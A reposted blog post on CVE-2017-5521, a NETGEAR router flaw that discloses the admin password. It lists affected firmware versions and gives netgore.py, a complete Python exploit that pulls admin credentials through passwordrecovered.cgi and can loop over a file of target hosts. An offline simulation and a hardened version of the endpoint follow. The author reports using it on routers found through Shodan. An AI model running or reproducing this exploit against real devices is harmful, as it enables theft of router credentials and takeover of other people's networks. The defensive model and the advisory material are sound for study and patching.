A vulnerability SpiderLabs published yesterday: when a user opens the router's web admin interface, is prompted to authenticate and then cancels the prompt, the router redirects to a page that exposes the password-recovery token. Requesting passwordrecovered.cgi?id=TOKEN with that token then returns the router admin username and password. Two practitioner caveats: the recovery CGI only hands out credentials when the password-recovery feature has not been set up (the exploit below reports "password recovery IS set" otherwise), and the "remote" variant only applies when the web interface is reachable from the WAN (remote management enabled); on a default configuration the attacker needs to be on the LAN.

Vulnerability details

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911

Affected versions (as listed in the advisory):

Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13

Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13

Netgear exploit (netgore.py):

```python
## netgore.py
# Reconstructed from the flattened listing and ported to Python 3. Behaviour
# follows the original: exp1 (Finding 1) spends the token leaked by the 401
# page, exp2 (Finding 2) calls passwordrecovered.cgi with a junk id. The
# request and credential-parsing code shared by both stages is factored out.
import sys
import html
import requests
import urllib3


def scrape(text, start_trig, end_trig):
    """Return the substring between start_trig and end_trig, or a sentinel."""
    if text.find(start_trig) != -1:
        return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
    return "i_dont_speak_english"


def fetch_index(ip, port):
    """1st stage: fetch the index page (http first, then https) and print the
    model taken from the WWW-Authenticate realm. Returns (base_url, response),
    or None when the header is missing (not a Netgear router)."""
    # disable nasty insecure ssl warning
    urllib3.disable_warnings()
    url = 'http://' + ip + ':' + port + '/'
    try:
        r = requests.get(url, timeout=10)
    except requests.RequestException:
        url = 'https://' + ip + ':' + port + '/'
        r = requests.get(url, verify=False, timeout=10)
    model = r.headers.get('WWW-Authenticate')
    if model is None:
        print("not a netgear router")
        return None
    # strip the 'Basic realm="' prefix and the closing quote
    print("Attacking: " + model[13:-1])
    return url, r


def extract_creds(text):
    """Pull the admin username and password out of the passwordrecovered.cgi
    page. Returns (username, password), or None if the page has no credential
    cells (recovery is set up, or the CGI refused)."""
    if text.find('left\">') == -1:
        return None
    username = repr(scrape(text, 'Router Admin Username</td>', '</td>'))
    username = scrape(username, '>', '\'')
    password = repr(scrape(text, 'Router Admin Password</td>', '</td>'))
    password = scrape(password, '>', '\'')
    if username == "i_dont_speak_english":
        # other page layout: the first and last 'left' cells hold the values
        username = scrape(text[text.find('left\">'):-1], 'left\">', '</td>')
        password = scrape(text[text.rfind('left\">'):-1], 'left\">', '</td>')
    # html encoding pops out of nowhere (&#35; for '#', &amp; for '&'); undo it
    return html.unescape(username), html.unescape(password)


def exp1(ip, port):
    """Finding 1: take the token from the 401 page, pass it to passwordrecovered.cgi."""
    index = fetch_index(ip, port)
    if index is None:
        return
    url, r = index
    token = scrape(r.text, 'unauth.cgi?id=', '\"')
    if token == 'i_dont_speak_english':
        print("not vulnerable")
        return
    print("token found: " + token)
    # 2nd stage - pass the token - get the password
    r = requests.post(url + 'passwordrecovered.cgi?id=' + token,
                      verify=False, timeout=10)
    creds = extract_creds(r.text)
    if creds is None:
        print("not vulnerable because password recovery IS set")
        return
    print("user: " + creds[0])
    print("pass: " + creds[1])


def exp2(ip, port):
    """Finding 2: no token at all; the first call since boot answers anyway."""
    index = fetch_index(ip, port)
    if index is None:
        return
    url, r = index
    # 2nd stage
    try:
        r = requests.post(url + 'passwordrecovered.cgi?id=get_rekt',
                          verify=False, timeout=10)
    except requests.RequestException:
        print("not vulnerable router")
        return
    creds = extract_creds(r.text)
    if creds is None:
        print("not vulnerable router, or someone else already accessed "
              "passwordrecovered.cgi, reboot router and test again")
        return
    print("user: " + creds[0])
    print("pass: " + creds[1])


def run(ip, port):
    print('---------start------------')
    print('target', ip, port)
    print('---------exp1------------')
    exp1(ip, port)
    print('---------exp2------------')
    exp2(ip, port)


if __name__ == "__main__":
    if len(sys.argv) > 2:
        run(sys.argv[1], sys.argv[2])
    else:
        # target.txt: one host per line, space separated, IP in the first
        # column and port in the third
        with open('target.txt') as f:
            for line in f:
                l = line.strip().split(' ')
                if len(l) > 2:
                    run(l[0], l[2])
```
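To make the two stages concrete without a router on the wire, here is an added example (not the original post's code and not netgore.py) that models the passwordrecovered.cgi check in Python, runs the same two stages against it, and puts a hardened version of the endpoint beside it. The router behaviour (a token re-issued on every unauthenticated hit, an id that is not checked until the CGI has been called once since boot, a credential table with '#' encoded as &#35;) is reconstructed from the advisory and from what the exploit relies on; the class names, token format, the serial-plus-security-answer proof in the hardened version and the credential values are assumptions made here.

```python
"""Offline model of the passwordrecovered.cgi check behind CVE-2017-5521.
Added example; class names, markup and credentials are assumptions."""
import html
import re
import secrets


def _creds_page(user, pwd):
    """Assumed markup mirroring what netgore.py scrapes, including the
    &#35; encoding of '#' that the exploit has to undo."""
    def esc(s):
        return html.escape(s, quote=False).replace('#', '&#35;')
    return ('<table><tr><td>Router Admin Username</td>'
            '<td class="left">%s</td></tr><tr><td>Router Admin Password</td>'
            '<td class="left">%s</td></tr></table>' % (esc(user), esc(pwd)))


class VulnerableRecovery:
    """Flawed logic as the advisory and the two exploit stages imply (assumed)."""

    def __init__(self, user, pwd):
        self._creds = (user, pwd)
        self._token = None           # re-issued on every unauthenticated hit
        self._recovery_used = False  # only a reboot clears this

    def get_root_unauthenticated(self):
        """Finding 1: the 401 page embeds the recovery token in a link."""
        self._token = secrets.token_hex(4)
        return '<html><a href="unauth.cgi?id=%s">retry</a></html>' % self._token

    def password_recovered(self, token_id):
        """Finding 2: the id is not checked until the CGI has been called once
        since boot; after that only the token leaked by the 401 page works."""
        if self._recovery_used and token_id != self._token:
            return '<html>Not allowed</html>'
        self._recovery_used = True
        return _creds_page(*self._creds)


class HardenedRecovery:
    """Same endpoints with the checks a recovery flow needs: feature must be
    enabled, the 401 page leaks nothing, a token is minted only after the
    owner proves possession (serial plus answers), and tokens are single use."""

    def __init__(self, user, pwd, enabled, serial, answers):
        self._creds = (user, pwd)
        self._enabled = enabled
        self._serial = serial
        self._answers = tuple(answers)
        self._pending = set()

    def get_root_unauthenticated(self):
        return '<html>401 Unauthorized</html>'

    def start_recovery(self, serial, answers):
        """One-time token, or None if recovery is off or the proof is wrong
        (constant-time compare so answers cannot be guessed by timing)."""
        if not self._enabled or serial != self._serial:
            return None
        if len(answers) != len(self._answers) or not all(
                secrets.compare_digest(a.encode(), b.encode())
                for a, b in zip(answers, self._answers)):
            return None
        token = secrets.token_urlsafe(16)
        self._pending.add(token)
        return token

    def password_recovered(self, token_id):
        if token_id not in self._pending:
            return '<html>Not allowed</html>'
        self._pending.discard(token_id)  # single use
        return _creds_page(*self._creds)


TOKEN_RE = re.compile(r'unauth\.cgi\?id=([^"&<]+)')
USER_RE = re.compile(r'Router Admin Username</td><td[^>]*>([^<]*)</td>')
PASS_RE = re.compile(r'Router Admin Password</td><td[^>]*>([^<]*)</td>')


def parse_creds(page):
    """(username, password) from a recovery page, entities decoded, or None."""
    u, p = USER_RE.search(page), PASS_RE.search(page)
    if not (u and p):
        return None
    return html.unescape(u.group(1)), html.unescape(p.group(1))


def exp1(router):
    """Stage 1 of netgore.py: harvest the token from the 401 page, spend it."""
    m = TOKEN_RE.search(router.get_root_unauthenticated())
    return parse_creds(router.password_recovered(m.group(1))) if m else None


def exp2(router):
    """Stage 2 of netgore.py: no token, just a junk id."""
    return parse_creds(router.password_recovered('get_rekt'))


if __name__ == '__main__':
    print('exp2, fresh boot:', exp2(VulnerableRecovery('admin', 'p#ss&word')))
    patched = HardenedRecovery('admin', 'pw', True, 'SN1', ('cat', 'blue'))
    print('exp1 vs hardened:', exp1(patched), 'exp2 vs hardened:', exp2(patched))
```

The model shows why the order of the two stages in netgore.py matters: once anything has called passwordrecovered.cgi since boot, exp2 is refused, but the token exp1 lifts from the 401 page still works on every later request. The hardened variant removes both paths at the design level: nothing in the unauthenticated response can be turned into a token, and a token only exists after a proof-of-possession step and is consumed on first use.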
After a Shodan search I tested a few Netgear devices; this vulnerability works cleanly.

Reposted from: https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html

CVE-2017-5521: Bypassing Authentication on NETGEAR Routers (Netgear authentication bypass)